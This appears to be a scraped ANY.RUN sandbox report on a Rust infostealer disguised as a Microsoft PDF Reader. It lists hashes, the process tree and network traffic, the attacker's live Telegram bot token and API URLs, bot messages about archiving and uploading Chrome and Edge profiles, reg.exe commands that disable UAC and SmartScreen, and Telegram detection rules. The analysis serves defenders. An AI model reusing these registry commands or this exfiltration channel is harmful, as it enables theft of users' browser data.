File name:

1.bin

Full analysis: https://app.any.run/tasks/a0661ad7-11cd-4561-959d-6febb99048f2
Verdict: Malicious activity
Analysis date: May 16, 2025, 22:29:35
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
telegram
ims-api
generic
rust
arch-doc
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 3 sections
MD5:

CA7468D34BC9F8E5729A90F62D12B6A4

SHA1:

2A3F1E67AFE9D9B3B92A23F28759FD5B4A1234A1

SHA256:

38D4DE2B555AEE0F6862BC4E236D09F2FEC55613221BE31E52C51A28F7CA2B48

SSDEEP:

98304:uki4srnUPGi3XOF78hP7R4OalRQIVNKTgqXYkWotDAlvW5DRnBEcpwsfpkagjgaR:4m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 1.bin.exe (PID: 5588)

    • Reads security settings of Internet Explorer

      • 1.bin.exe (PID: 5588)

    • Reads the date of Windows installation

      • 1.bin.exe (PID: 5588)

    • Starts CMD.EXE for commands execution

      • 1.bin.exe (PID: 5588)

    • Executing commands from a ".bat" file

      • 1.bin.exe (PID: 5588)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5176)

    • The executable file from the user directory is run by the CMD process

      • gemini.exe (PID: 4988)

    • The process checks if it is being run in the virtual environment

      • gemini.exe (PID: 4988)

    • Searches for installed software

      • gemini.exe (PID: 4988)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • gemini.exe (PID: 4988)

    • There is functionality for taking screenshot (YARA)

      • gemini.exe (PID: 4988)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • gemini.exe (PID: 4988)

  • INFO

    • Reads the computer name

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)

    • Creates files or folders in the user directory

      • 1.bin.exe (PID: 5588)

    • Create files in a temporary directory

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)

    • The sample compiled with english language support

      • 1.bin.exe (PID: 5588)

    • Checks supported languages

      • 1.bin.exe (PID: 5588)
      • gemini.exe (PID: 4988)

    • Checks proxy server information

      • gemini.exe (PID: 4988)

    • Process checks computer location settings

      • 1.bin.exe (PID: 5588)

    • Reads the software policy settings

      • gemini.exe (PID: 4988)

    • Attempting to use instant messaging service

      • gemini.exe (PID: 4988)

    • Application based on Rust

      • gemini.exe (PID: 4988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(4988) gemini.exe
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
Telegram-Responses
oktrue
result
message_id101
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
document
file_nameChrome_chunk_1.part
file_idBQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA
file_unique_idAgADP4cAAhZnOEk
file_size1686952
captionChrome часть 1/1
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id98
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434587
textАрхивирую Chrome...
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
Telegram-Responses
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id102
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textЧасть 1 успешно отправлена
Telegram-Responses
oktrue
result
message_id101
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
document
file_nameChrome_chunk_1.part
file_idBQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA
file_unique_idAgADP4cAAhZnOEk
file_size1686952
captionChrome часть 1/1
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id98
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434587
textАрхивирую Chrome...
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (87)
.exe | Generic Win/DOS Executable (6.4)
.exe | DOS Executable Generic (6.4)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2019:07:30 08:52:21+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, Large address aware
PEType: PE32+
LinkerVersion: 2.5
CodeSize: 2027520
InitializedDataSize: 16384
UninitializedDataSize: 102400
EntryPoint: 0x207630
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 4.16.3.12
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: Debug, Pre-release, Private build
FileOS: Windows 16-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
FileVersion: 4.16.3.12
ProductVersion: 4.16.3
ProductName: Microsoft PDF Reader Document
OriginalFileName: Reader.exe
InternalName: Reader
FileDescription: Программный продукт
CompanyName: Microsoft Corporation, inc.
LegalTrademarks: Microsoft Corp., inc.
LegalCopyright: Microsoft Corporation, inc.
PrivateBuild: 1679
SpecialBuild: 4.16.3.12
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
13
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 1.bin.exe cmd.exe no specs conhost.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs gemini.exe sppextcomobj.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
516reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d 0 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1056C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
1628reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2236"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2432reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ribbon" /v "MinimizedStateTabletModeOff" /t REG_DWORD /d 1 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4896reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "ShellSmartScreenLevel" /t REG_SZ /d "" /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4988"C:\Users\admin\AppData\Roaming\gemini.exe" C:\Users\admin\AppData\Roaming\gemini.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\roaming\gemini.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
ims-api
(PID) Process(4988) gemini.exe
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
(PID) Process(4988) gemini.exe
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
Telegram-Responses
oktrue
result
message_id101
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
document
file_nameChrome_chunk_1.part
file_idBQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA
file_unique_idAgADP4cAAhZnOEk
file_size1686952
captionChrome часть 1/1
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id98
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434587
textАрхивирую Chrome...
(PID) Process(4988) gemini.exe
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
End-PointsendMessage
Args
Telegram-Responses
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id102
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textЧасть 1 успешно отправлена
(PID) Process(4988) gemini.exe
Telegram-Responses
oktrue
result
message_id101
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
document
file_nameChrome_chunk_1.part
file_idBQACAgIAAxkDAANlaCe8YjLCB4wjTBK0uF-gvQNj_ywAAj-HAAIWZzhJEDN74GXDb_o2BA
file_unique_idAgADP4cAAhZnOEk
file_size1686952
captionChrome часть 1/1
oktrue
result
message_id103
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434594
textАрхивирую Edge...
oktrue
result
message_id98
from
id7730596169
is_bottrue
first_nameMyboot
usernameKERTYHUBOT
chat
id7656319589
first_nameWerty
usernameWertyFeart
typeprivate
date1747434587
textАрхивирую Chrome...
(PID) Process(4988) gemini.exe
Telegram-Tokens (1)7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Telegram-Info-Links
7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og
Get info about bothttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getMe
Get incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getUpdates
Get webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7730596169:AAFtJqZrlChOXHtHLY-yZh_YlWkc--pW7og/deleteWebhook?drop_pending_updates=true
5048reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
5176"C:\WINDOWS\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\BEAE.tmp\BEBF.tmp\BEC0.bat C:\Users\admin\AppData\Local\Temp\1.bin.exe"C:\Windows\System32\cmd.exe1.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
5588"C:\Users\admin\AppData\Local\Temp\1.bin.exe" C:\Users\admin\AppData\Local\Temp\1.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\1.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
4 894
Read events
4 893
Write events
1
Delete events
0

Modification events

(PID) Process:(2432) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon
Operation:writeName:MinimizedStateTabletModeOff
Value:
1
Executable files
1
Suspicious files
2
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_profile.zip
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_3.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_2.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_1.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_4.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_5.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_6.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_7.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_8.part
MD5:
SHA256:
4988gemini.exeC:\Users\admin\AppData\Local\Temp\.syscache_R26tZgMR\Edge_chunk_9.part
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
48
DNS requests
15
Threats
62

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.179:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2284
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2284
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.179:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
4988
gemini.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
4988
gemini.exe
149.154.167.99:443
core.telegram.org
Telegram Messenger Inc
GB
whitelisted
6544
svchost.exe
40.126.32.140:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2284
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.184.238
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.179
  • 23.48.23.174
  • 23.48.23.161
  • 23.48.23.188
  • 23.48.23.173
  • 23.48.23.180
  • 23.48.23.166
  • 23.48.23.163
  • 23.48.23.168
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
core.telegram.org
  • 149.154.167.99
whitelisted
login.live.com
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.72
  • 40.126.32.136
  • 20.190.160.130
  • 20.190.160.14
  • 20.190.160.128
  • 40.126.32.74
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4988
gemini.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
No debug info